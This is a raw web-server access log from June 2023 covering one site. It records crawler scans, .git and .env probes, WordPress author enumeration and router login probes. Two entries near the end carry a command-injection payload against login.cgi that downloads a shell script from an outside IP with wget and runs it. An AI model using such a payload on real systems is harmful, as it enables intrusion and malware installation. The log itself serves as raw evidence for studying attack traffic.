zgrab/0.x" 159.65.168.103 - - [08/Jun/2023:19:02:24 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 159.65.168.103 - - [08/Jun/2023:19:02:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 212.154.7.246 - - [08/Jun/2023:19:04:33 +0200] "GET /api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 212.154.7.246 - - [08/Jun/2023:19:04:34 +0200] "POST /api HTTP/1.1" 404 279 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 183.136.225.32 - - [08/Jun/2023:19:06:38 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.32 - - [08/Jun/2023:19:06:40 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 3.124.3.208 - - [08/Jun/2023:19:11:12 +0200] "GET /buecherliste/uber-den-tod-und-das-leben-danach/.git/HEAD HTTP/1.1" 404 317 "-" "RepoLookoutBot/v1.1.0-141-g52ab5f9 (abuse reports to abuse@repo-lookout.org)" 3.124.3.208 - - [08/Jun/2023:19:11:21 +0200] "GET /buecherliste/the-secret-das-geheimnis/.git/HEAD HTTP/1.1" 404 312 "-" "RepoLookoutBot/v1.1.0-141-g52ab5f9 (abuse reports to abuse@repo-lookout.org)" 3.124.3.208 - - [08/Jun/2023:19:11:55 +0200] "GET /buecherliste/das-grose-handbuch-der-reinkarnation/.git/HEAD HTTP/1.1" 404 320 "-" "RepoLookoutBot/v1.1.0-141-g52ab5f9 (abuse reports to abuse@repo-lookout.org)" 3.124.3.208 - - [08/Jun/2023:19:12:30 +0200] "GET /.git/HEAD HTTP/1.1" 404 288 "-" "RepoLookoutBot/v1.1.0-141-g52ab5f9 (abuse reports to abuse@repo-lookout.org)" 3.124.3.208 - - [08/Jun/2023:19:13:05 +0200] "GET /buecherliste/.git/HEAD HTTP/1.1" 404 296 "-" "RepoLookoutBot/v1.1.0-141-g52ab5f9 (abuse reports to abuse@repo-lookout.org)" 31.220.1.83 - - [08/Jun/2023:19:28:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 152.32.180.93 - - [08/Jun/2023:19:50:29 +0200] "\x16\x03\x01\x01\t\x01" 400 383 "-" "-" 152.32.180.93 - - [08/Jun/2023:19:50:41 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 152.32.180.93 - - [08/Jun/2023:19:50:42 +0200] "GET /layout.php HTTP/1.1" 200 816 "http://212.69.160.11/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 152.32.180.93 - - [08/Jun/2023:19:50:43 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 152.32.180.93 - - [08/Jun/2023:19:50:44 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 152.32.180.93 - - [08/Jun/2023:19:50:44 +0200] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 152.32.180.93 - - [08/Jun/2023:19:50:45 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "-" "Go-http-client/1.1" 18.140.14.152 - - [08/Jun/2023:20:00:18 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 198.199.94.65 - - [08/Jun/2023:20:04:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 90.206.237.216 - - [08/Jun/2023:20:04:15 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.8307.1331 Mobile Safari/537.36" 3.1.165.42 - - [08/Jun/2023:20:08:18 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 136.169.119.33 - - [08/Jun/2023:20:11:16 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 1.14.92.22 - - [08/Jun/2023:20:13:43 +0200] "GET /wp-login.php HTTP/1.1" 404 294 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:13:56 +0200] "GET /?author=1 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:13:56 +0200] "GET /?author=2 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:13:57 +0200] "GET /?author=3 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:13:58 +0200] "GET /?author=4 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:13:59 +0200] "GET /?author=5 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:02 +0200] "GET /?author=6 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:03 +0200] "GET /?author=7 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:03 +0200] "GET /?author=8 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:05 +0200] "GET /?author=9 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:05 +0200] "GET /?author=10 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:06 +0200] "GET /?author=11 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:06 +0200] "GET /?author=12 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:10 +0200] "GET /?author=13 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:10 +0200] "GET /?author=14 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:11 +0200] "GET /?author=15 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:15 +0200] "GET /?author=16 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:17 +0200] "GET /?author=17 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:19 +0200] "GET /?author=18 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:19 +0200] "GET /?author=19 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 1.14.92.22 - - [08/Jun/2023:20:14:20 +0200] "GET /?author=20 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" 221.229.214.27 - - [08/Jun/2023:20:26:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" 102.129.234.220 - - [08/Jun/2023:20:43:44 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:66.0) Gecko/20100101 Firefox/66.0" 185.180.143.138 - - [08/Jun/2023:21:08:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 103.12.135.123 - - [08/Jun/2023:21:18:09 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 109.207.200.42 - - [08/Jun/2023:21:20:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 188.226.166.7 - - [08/Jun/2023:21:47:11 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:11 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:11 +0200] "\x16\x03\x03\x01W\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:11 +0200] "\x16\x03\x03\x01I\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:11 +0200] "\x16\x03\x03\x01\x9a\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:12 +0200] "\x16\x03\x02\x01\x9b\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:12 +0200] "\x16\x03\x01\x01\xa8\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:12 +0200] "\x16\x03\x01\x01\xa8\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:12 +0200] "\x16\x03\x01\x01\x9e\x01" 400 383 "-" "-" 188.226.166.7 - - [08/Jun/2023:21:47:12 +0200] "\x16\x03\x01\x01\xb5\x01" 400 383 "-" "-" 198.235.24.108 - - [08/Jun/2023:23:06:44 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 87.150.117.123 - - [08/Jun/2023:23:39:58 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 180.149.125.163 - - [09/Jun/2023:00:10:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" 167.94.145.58 - - [09/Jun/2023:00:49:34 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.94.145.58 - - [09/Jun/2023:00:49:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.58 - - [09/Jun/2023:00:49:34 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.94.145.58 - - [09/Jun/2023:00:49:34 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.58 - - [09/Jun/2023:00:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 93.183.156.161 - - [09/Jun/2023:00:53:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 93.183.156.161 - - [09/Jun/2023:00:54:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 185.180.143.49 - - [09/Jun/2023:01:06:37 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 179.43.177.244 - - [09/Jun/2023:01:35:28 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 80.66.88.204 - - [09/Jun/2023:01:42:43 +0200] "\x03" 400 383 "-" "-"